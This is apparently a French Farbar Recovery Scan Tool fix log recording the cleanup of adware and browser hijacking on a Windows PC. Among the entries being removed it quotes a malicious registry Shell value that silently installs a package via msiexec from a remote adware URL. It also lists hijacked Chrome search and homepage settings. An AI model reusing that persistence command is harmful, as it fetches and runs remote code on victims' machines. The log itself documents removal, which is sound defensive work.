Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 07-09-2021 Exécuté par Théophile Vallade (07-09-2021 19:50:46) Run:2 Exécuté depuis C:\Users\Théophile Vallade\Downloads Profils chargés: defaultuser0 & Théophile Vallade & tvall Mode d'amorçage: Normal ============================================== fixlist contenu: ***************** CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1YRTMyOTVLN8IcFkVQNWY4NkNYMWMyRTwdNTlQRkU3Fc== /q GroupPolicy: Restriction - Chrome Policies: C:\ProgramData\NTUSER.pol: Restriction Task: {4822200C-3399-4B4F-8ECD-88D08961D913} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [GoogleChromeAutoLaunch_7191D2EE431CF1BFBD07262D6610CBA5] => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [MicrosoftEdgeAutoLaunch_18DCCC84771B89068C3B3D9FB28E3E28] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 Task: {20F29426-17B0-4437-AE9A-553B269EC0B1} - System32\Tasks\{70F8B8CF-C72D-4487-BCD6-A67A3DF55CC4} => "c:\program files (x86)\dohat\application\chrome.exe" https://ui.skype.com/ui/0/7.41.0.101/fr/abandoninstall?page=tsMain Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] CHR HomePage: Default -> hxxp://www.home-explore.com/ CHR NewTab: Default -> Not-active:"chrome-extension://gfoabcdjalmeenbjjngidappmppchblc/homePageRedirect.html", Active:"chrome-extension://gpdpldlbafdmhlmcdllcjgoigmpjonfc/newtab.html" CHR DefaultSearchURL: Default -> hxxp://www.home-explore.com/search?q={searchTerms} CHR DefaultSearchKeyword: Default -> recherche C:\program files (x86)\dohat EmptyTemp: ***************** Le Point de restauration a été créé avec succès. Processus fermé avec succès. "HKU\S-1-5-21-4027503653-722601690-3486861723-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => non trouvé(e) "C:\WINDOWS\system32\GroupPolicy\Machine" => non trouvé(e) C:\ProgramData\NTUSER.pol => déplacé(es) avec succès "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4822200C-3399-4B4F-8ECD-88D08961D913}" => non trouvé(e) "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => non trouvé(e) "HKU\S-1-5-21-4027503653-722601690-3486861723-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_7191D2EE431CF1BFBD07262D6610CBA5" => non trouvé(e) "HKU\S-1-5-21-4027503653-722601690-3486861723-1001\Software\Microsoft\Windows\CurrentVersion\Run\\MicrosoftEdgeAutoLaunch_18DCCC84771B89068C3B3D9FB28E3E28" => non trouvé(e) "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{20F29426-17B0-4437-AE9A-553B269EC0B1}" => non trouvé(e) "C:\WINDOWS\System32\Tasks\{70F8B8CF-C72D-4487-BCD6-A67A3DF55CC4}" => non trouvé(e) "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{70F8B8CF-C72D-4487-BCD6-A67A3DF55CC4}" => non trouvé(e) HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => non trouvé(e) HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => non trouvé(e) HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => non trouvé(e) HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => non trouvé(e) HKLM\SOFTWARE\Google\Chrome\Extensions\iikflkcanblccfahdhdonehdalibjnif => non trouvé(e) HKLM\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => non trouvé(e) HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd => non trouvé(e) HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => non trouvé(e) HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iikflkcanblccfahdhdonehdalibjnif => non trouvé(e) HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => non trouvé(e) "Chrome HomePage" => supprimé(es) avec succès "Chrome NewTab" => supprimé(es) avec succès "Chrome DefaultSearchURL" => non trouvé(e) "Chrome DefaultSearchKeyword" => non trouvé(e) "C:\program files (x86)\dohat" => non trouvé(e) =========== EmptyTemp: ========== BITS transfer queue => 10772480 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9530006 B Java, Flash, Steam htmlcache => 0 B Windows/system/drivers => 6536 B Edge => 0 B Chrome => 12274516 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 0 B LocalService => 4836 B NetworkService => 4836 B defaultuser0 => 4836 B Théophile Vallade => 354058 B tvall => 354058 B RecycleBin => 0 B EmptyTemp: => 31.8 MB données temporaires supprimées. ================================ Le système a dû redémarrer. ==== Fin de Fixlog 19:52:16 ====